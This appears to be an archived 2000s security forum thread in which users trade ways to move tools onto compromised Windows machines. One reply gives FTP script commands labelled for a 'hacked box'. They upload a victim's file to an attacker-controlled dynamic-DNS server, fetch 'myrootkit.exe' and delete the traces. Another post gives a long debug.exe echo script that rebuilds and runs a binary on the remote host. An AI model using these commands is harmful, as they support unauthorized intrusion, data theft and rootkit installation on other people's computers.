i want to echo the file uptime.exe through the shell to the remote computer, like on here:
http://www.governmentsecurity.org/forum/in...showtopic=14202
could anyone please help me builiding the echo commands.
10x ahead.
Articles
Metasploit Framework Windows Tutorial The Archives General GSO | Full Version: Echo Uptime.exe To Remote
hi, i do it like this
CODE ///////////////////////////// download from hacked box /////////////////////// echo open mydynserver.myftp.org > c:\windows\ftplog.txt echo test >> c:\windows\ftplog.txt echo test >> c:\windows\ftplog.txt echo bin >> c:\windows\ftplog.txt echo put c:\shared~1\movies\madagascar.avi >> c:\windows\ftplog.txt echo quit >> c:\windows\ftplog.txt ftp -s:c:\windows\ftplog.txt del c:\windows\ftplog.txt /////////////// CODE ///////////////////////////// upload to hacked box /////////////////////// echo open mydynserver.myftp.org > c:\windows\ftplog.txt echo test >> c:\windows\ftplog.txt echo test >> c:\windows\ftplog.txt echo lcd c:\windows >> c:\windows\ftplog.txt echo bin >> c:\windows\ftplog.txt echo get myrootkit.exe >> c:\windows\ftplog.txt echo quit >> c:\windows\ftplog.txt ftp -s:c:\windows\ftplog.txt del c:\windows\ftplog.txt ////////////// FTPit is a great tool, specially the part of injecting into the explorer process. hope i helped.  palmeiro
no bro, thats not what i need.
i dont need the ftpit. i want to echo the uptime.exe through the shell and not to upload it through ftp.
use exe to text
QUOTE if you have shell access to a server or clinet but no way to send file to it then use this program to convert an .exe to .txt then paste each line into your shell. http://www.governmentsecurity.org/forum/in...showtopic=14939
delete please i wanted to post the code but its to big. sorry
Post it as an attachment
66lines isnt too bad ; im also attaching my compressed uptime console app
only 929bytes  CODE echo off echo n Ashiyane > Q7X echo e 100 4D 5A 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 0 0 >> Q7X echo e 110 50 45 0 0 4C 1 2 0 0 0 0 0 0 0 0 0 >> Q7X echo e 120 0 0 0 0 E0 0 F 1 B 1 0 0 0 2 0 0 >> Q7X echo e 130 0 0 0 0 0 0 0 0 91 41 0 0 10 0 0 0 >> Q7X echo e 140 0 10 0 0 0 0 40 0 0 10 0 0 0 2 0 0 >> Q7X echo e 150 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 >> Q7X echo e 160 0 50 0 0 0 2 0 0 0 0 0 0 3 0 0 0 >> Q7X echo e 170 0 0 10 0 0 10 0 0 0 0 10 0 0 10 0 0 >> Q7X echo e 180 0 0 0 0 10 0 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 190 8D 41 0 0 14 0 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 1A0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 1B0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 1C0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 1D0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 1E0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 1F0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 200 0 0 0 0 0 0 0 0 4D 45 57 0 46 12 D2 C3 >> Q7X echo e 210 0 30 0 0 0 10 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 220 0 0 0 0 0 0 0 0 0 0 0 0 E0 0 0 C0 >> Q7X echo e 230 2 D2 75 DB 8A 16 EB D4 0 10 0 0 0 40 0 0 >> Q7X echo e 240 A1 1 0 0 0 2 0 0 0 0 0 0 0 0 0 0 >> Q7X echo e 250 0 0 0 0 E0 0 0 C0 BE 1C 40 40 0 8B DE AD >> Q7X echo e 260 AD 50 AD 97 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF >> Q7X echo e 270 13 73 16 33 C0 FF 13 73 21 B6 80 41 B0 10 FF 13 >> Q7X echo e 280 12 C0 73 FA 75 3E AA EB E0 E8 72 3E 0 0 2 F6 >> Q7X echo e 290 83 D9 1 75 E FF 53 FC EB 26 AC D1 E8 74 2F 13 >> Q7X echo e 2A0 C9 EB 1A 91 48 C1 E0 8 AC FF 53 FC 3D 0 7D 0 >> Q7X echo e 2B0 0 73 A 80 FC 5 73 6 83 F8 7F 77 2 41 41 95 >> Q7X echo e 2C0 8B C5 B6 0 56 8B F7 2B F0 F3 A4 5E EB 9B AD 85 >> Q7X echo e 2D0 C0 75 90 AD 96 AD 97 56 AC 3C 0 75 FB FF 53 F0 >> Q7X echo e 2E0 95 56 AD F C8 40 59 74 EC 79 7 AC 3C 0 75 FB >> Q7X echo e 2F0 91 40 50 55 FF 53 F4 AB 75 E7 C3 0 0 0 0 0 >> Q7X echo e 300 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 62 41 0 0 >> Q7X echo e 310 6F 41 0 0 0 0 0 0 0 40 40 0 30 1 40 0 >> Q7X echo e 320 0 10 40 0 0 10 40 0 E8 70 7 CE 2 6A 1D DB >> Q7X echo e 330 4C F E3 4D 3D B B9 A0 3 F 2B D2 F7 F1 2E 3C >> Q7X echo e 340 14 9 8A 52 5 BF AB 18 F E 50 68 7 30 40 E >> Q7X echo e 350 BC F1 B E8 F 85 2B 83 C4 18 22 D 14 20 C3 CC >> Q7X echo e 360 FF 25 F0 20 83 21 C 4 91 8 C 55 8B EC 48 F4 >> Q7X echo e 370 C 6A F5 E8 67 43 89 7 45 FC FF 75 8 B5 24 5B >> Q7X echo e 380 B 2A 83 8D A9 F8 50 BC 22 EC 29 6 FC 33 E8 4B >> Q7X echo e 390 2F 8B E 24 C9 C2 4 A CC 1 B3 79 53 7 22 8 >> Q7X echo e 3A0 8D 50 3 90 18 83 C0 4 F1 FC FF FE C0 2 F7 D3 >> Q7X echo e 3B0 23 CB 81 22 E1 80 3E 74 E9 36 C1 C 68 3B 75 6 >> Q7X echo e 3C0 FA 60 10 40 2 D0 E1 1B 28 C2 5B 3E DC F4 29 80 >> Q7X echo e 3D0 9B C C 0 0 0 30 40 0 75 7 70 20 66 6F 72 >> Q7X echo e 3E0 43 25 6C CF 80 64 61 79 28 2A 73 29 B 2A 68 72 >> Q7X echo e 3F0 A 1C 2D 32 2E B0 1D 6D 69 6E A7 F 3D 91 65 63 >> Q7X echo e 400 60 0 98 3F 40 0 14 38 20 40 0 75 73 65 72 33 >> Q7X echo e 410 32 2E 38 64 6C F0 3E 80 77 3E 70 3 69 6E 74 66 >> Q7X echo e 420 41 83 FF 70 3 CC 3D 6B 3A 6E E6 6C AC 20 7E 47 >> Q7X echo e 430 39 74 53 7A 1B 48 61 6E 1C D4 3 45 78 69 F8 50 >> Q7X echo e 440 72 6F 7B 63 71 73 A9 1B 54 FF D9 6B 43 FD 75 B3 >> Q7X echo e 450 80 1C 57 7F 8E 3A 65 46 51 26 80 0 0 0 0 0 >> Q7X echo e 460 98 3F 40 0 4C 6F 61 64 4C 69 62 72 61 72 79 41 >> Q7X echo e 470 0 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 0 >> Q7X echo e 480 0 0 0 0 0 0 0 0 0 0 0 0 0 C 40 0 >> Q7X echo e 490 0 E9 C2 BF FF FF 0 0 0 2 0 0 0 C 40 0 >> Q7X echo e 4A0 0 0 >> Q7X echo rcx >> Q7X echo 3A1 >> Q7X echo w >> Q7X echo q >> Q7X debug <Q7X>nul & ren Ashiyane up.exe & up.exe & echo on
10x alot
helped me alot anyone knows what the QUOTE echo rcx >> Q7X echo 3A1 >> Q7X stands for?
it seems that you up.exe is faking. ive got a 121 days of uptime. and it shows only 20
 here is your 1K uptime: CODE C:\Documents and Settings\Admin\Desktop>up up for 21 day(s) 10 hr(s) 59 min(s) 20 sec(s) and here is another 48K uptime: CODE C:\Documents and Settings\Admin\Desktop>uptime \\SERVER has been up for: 120 day(s), 21 hour(s), 8 minute(s), 4 second(s) anyone got a 100% working uptime.exe that count a large mount up uptime and takes less then 48K?
I've got this small program called ComInfo.exe which creates a ComInfo.txt like this:
CODE ----------------------------------------Computer Info--------------------------------------------- Operating System: Windows NT 5.1 Build 2600 Service Pack: Windows NT Processor Vendor: Intel Processor: Pentium III "Coppermine" etc.. Up Time: 11hr : 4min : 57sec C: [50.974 MB \ 80.876 MB Free disk space] Coded By Digital_Chaos, idea by Oneiro. All rights reserved © It's 53 kb, but I'm sure you can strip it to 48.
nuh bro it takes too much time to echo such a big file...
so i there any other fast way or a less KB file?
Maybe the Windows Resource-Kit is installed on the machine (its not by default, but good admins install it ;-) ) : try to start "srvinfo.exe" - it shows uptime, free space, installed patches, machine name,processors and much more... AND its a Microsoft-Tool, so its not detected (like some other tools) and runs on every Windows machine without problems. I never understood why ppl are coding their own info-tools when there already is a perfect tool onboard most machines...
regards /edited http://www.microsoft.com/technet/prodtechn...e/2_to6raa.mspx http://www.dynawell.com/reskit/microsoft/win2000/srvinfo.zip
ive tried it in some oses and there is no srvinfo
CODE Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>srvinfo.exe 'srvinfo.exe' is not recognized as an internal or external command, operable program or batch file. C:\WINDOWS\system32> CODE Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>srvinfo 'srvinfo' is not recognized as an internal or external command, operable program or batch file. C:\WINNT\system32>
you can also try "systeminfo" but it probably only works on xp and maybe on 2k3 dunno
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc. |
||
